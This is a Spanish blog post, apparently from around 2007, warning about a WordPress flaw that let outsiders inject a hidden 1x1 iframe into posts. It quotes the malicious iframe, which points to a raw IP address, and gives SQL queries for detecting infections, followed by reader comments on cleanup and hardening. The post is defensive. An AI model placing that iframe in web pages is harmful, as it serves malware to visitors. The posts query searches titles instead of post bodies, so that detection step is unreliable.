Contenido

Nuevo fallo en WordPress, insercción de iframe

6 nov

+ 22

Eduardo de De Mas Blog, me avisa de que han reportado un nuevo bug de WordPress, que aún están por corregir, pero que si conocemos podemos estar atentos para controlarlo.

Al parecer el bug, permite aprovecharse de algún exploit que permite insertar en WordPress un iframe con la siguiente estructura.

<!-- Traffic Statistics -->
<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->

El problema es que este contenido, aparece dentro del contenido del post, LO HA INTRODUCIDO ALGUIEN AJENO AL BLOG MEDIANTE UN EXPLOIT. Por lo que evidentemente pueden insertar contenido malicioso dentro de nuestros posts, algo realmente delicado.

Por desgracia, esto afecta a varias versiones de WordPress, incluida la 2.3.1.

Comprobar si ya hemos sido atacados

Para comprobar si ya hemos sido atacados, usaremos phpmyadmin (o similar) para buscar en el contenido de nuestros posts y comentarios (por si acaso) algún indicio de <iframe />

//Comentarios
SELECT *  FROM `PREFIX_comments` WHERE `comment_content` LIKE  '%<iframe%;

//Posts
SELECT *  FROM `PREFIX_posts` WHERE `post_title` LIKE  '%<iframe%';

PREFIX, es el prefijo que pusimos al instalar WordPress.

  • He mirado y nada. Por si acaso, copia de seguridad actualizada de todos los ficheros a mis discos duros.

    Pues eso, no estaría de más que todos hiciesen lo mismo por aquello de que más vale prevenir…

  • Holas,
    Me había dado cuenta de esto hace un par de días incluso lo utilice en uno de mis posts en mi blog, pero no veo como un bug permitir incluir iframes en el post. Contrario sería que se pudiera hacer en los comentarios.

    En vez de bug yo lo llamaría funcionalidad, en el caso de tener varios autores en tu blog se debería poder restringir el acceso a esas funcionalidades (no se si existe eso ya).

    Saludos!

  • Creo que no me explicado bien, me refiero a que otras personas pueden insertar iframes en nuestro contenido.

    Personas sin registrar y ajenas al blog.

  • Ahora me doy cuenta de lo que estás hablando… Yo creo que es más que peligroso el asunto del iframe por el sentido de que se pueden insertar otros codigos al post…

    Buen dato

  • Usar Mod_security sobre apache es una buena solución de seguridad.

  • Tendriamos que ver a quienes afecta ese bug… a los que cambiaron el prefijo wp_ por otro o a todos =)… seria buen dato

  • ops.. !!! :x confundi a Andres con Arturo de Artux dot com dot ar Sorry Andresito por el resbalon, seguimos al pendiente de esta noticia :)

  • Ojala que pronto se encuentre una solucion a este bug, por que estan comprometidos nuestros post.

  • agregando un plugin que filtre palabras (groserias y cosas asi) se debiera corregir el fallo, solo seria agregar ciertos tags HTML como palabras prohibidas

  • Buenas noches a todos.
    Nosotros tuvimos esa incidencia tanto en nuestra Home (sin wordpress) y en varias páginas de la instalación de WordPress.
    Es decir, es un exploit que se aprovecha de los permisos de escritura del WordPress.
    Lo hemos solucionado de la siguiente forma:
    1- Eliminando las entradas al “iframe” de todas las páginas (recuerden que no solo afecta a las páginas de wordpress, en nuestro caso tambien apareció dicha entrada en el “index.html” del dominio principal)
    2- Proteger con contraseña el directorio “wp-admin”
    3- Asegurar permisos “chmod”. En nuestro caso teníamos algunos ficheros con permisos de escritura innecesarios. Ahora todos nuestros directorios esta con 755 y ficheros 644.

    Desde que hicimos estas modificaciones, no hemos vuelto a tener problemas. En especial, desde que protegimos con contraseña el directorio “wp-admin” y eliminamos los permisos de escritura en plugins (*.php y *css)

    Un saludo a todos.

  • Se sabe si para WP2.5 se ha solucionado? Puedo confirmar que en WP2.3.3 ocurre x-P

  • Estoy teniendo un problema parecido en mi Blog, aunque éste parece tener la intención de tumbar la web de MSN.com.

    ¿Alguien tiene mas información sobre lo sucedido?

    http://www.entrecodigos.com/2008/07/inyeccion-de-iframe-en-wordpress.html

  • igual fui atacada en esta pagina en wordpress 2.3.3 , e inclusive ya hasta google me bloqueó, la verdad tenia mucho tiempo de no actualizar la página y tenia carpetas con todos los permisos, realizcé la consulta que poponen en esta página : SELECT * FROM `PREFIX_posts` WHERE `post_title` LIKE ‘%<iframe%';

    y me apareció un post, lo eliminé por supuesto, pero mi duda es: ¿es necesario que borre toda la página, base de datos, contraseñas de acceso a la base de datos, o que solo actualize la versión de wordpress, la pregunta es por cual versión?

  • Hola a todos lleva varios dias intentanto limpiar mi blog, que me lo
    han hackeado o algo parecido. Utilizo wordpress, he utilizado plugin
    sploit scaner y me detecta varios iframes o script maliciosos y me
    indica en que carpeta estan. Accedo por ftp a dichas carpetas o
    archivos, los edito los limpio y los vuelvo a subir hasta que queda
    todo limpio. Pero al dia siguiente vuelve a salir, la mayoria estan en
    los archivos index.

    He quitado toda publicidad, el cambiado el theme y aún asi vuelve a
    salir los dichosos codigos maliciosos por lo que google no me da el
    visto bueno y dice que mi blog es un peligro.

    He accedido a mi base de datos, en este tema estoy mas pegado. En el
    buscador de la base de datos he intentado localizar los iframes pero
    no los encuentra, no se si lo hago bien.

    Lo curioso tambien es que se veo el codigo fuente de mis paginas, en
    todas ellas salel dicho iframe al final de ellas.

    Alguien tiene alguna solución, necesito ayuda por favor ?

    gracias

  • Por cierto utilizao wp 2.7 ultima versión.

  • hola ya que estan tratando el tema del iframe estoy intentando isertar uno en una pagina de mi wordpress

    el codigo es un buscador de innmuebles
    este es el codigo

    y lo que me muestra al publicar la pagina es este codigo

    src=”http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&id_usuario_di=0″ name=”I1″>

    y no el buscador como tal en este enlace se ve el buscador de como se deberia ver correctamente

    http://www.software-inmobiliario.com/site/p_frame_externos.php?xp=7&id_usuario_di=0

    como logro hacerlo de la manera correcta

    gracias de antemano

Comentar

#

Me reservo el derecho de eliminar y/o modificar los comentarios que contengan lenguaje inapropiado, spam u otras conductas no apropiadas en una comunidad civilizada. Si tu comentario no aparece, puede ser que akismet lo haya capturado, cada día lo reviso y lo coloco en su lugar. Siento las molestias.